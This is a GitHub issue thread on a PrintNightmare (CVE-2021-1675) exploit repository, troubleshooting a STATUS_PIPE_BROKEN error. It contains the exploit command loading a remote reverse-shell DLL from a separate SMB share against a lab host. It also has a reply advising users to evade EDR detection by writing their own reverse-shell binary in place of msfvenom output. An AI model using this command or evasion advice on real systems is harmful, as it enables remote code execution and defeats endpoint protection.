cube0x0 / CVE-2021-1675

C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527

SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been clo #38

Open czz1233 opened 3 years ago

czz1233 commented 3 years ago

```
sudo python3 CVE-2021-1675.py test.local/chen:123.com@192.168.121.136 '\192.168.121.128\smb\reverse.dll'
[*] Connecting to ncacn_np:192.168.121.136[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ce3301b66255a0fb\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.121.128\smb\reverse.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
    bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
    return self.read(tid, fid, offset, max_size, wait_answer)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1312, in read
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/kali/CVE-2021-1675.py", line 192, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/kali/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
    answer = self.recv()
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
    response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
    return self.__smb_connection.readFile(self.tid, self.handle)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 603, in readFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)
```

MPereira95 commented 3 years ago

Hello! This error happens to me because my EDR detects and blocks the dll. Try making another dll or exe file and this error will disappear.

czz1233 commented 3 years ago

> Hello! This error happens to me because my EDR detects and blocks the dll. Try making another dll or exe file and this error will disappear.

How did you solve it?

MPereira95 commented 3 years ago

I stopped generating a dll with msfvenom! I wrote my own reverse shell exe and experimented, and I searched here on GitHub for reverse shell DLLs to test, and this error stopped.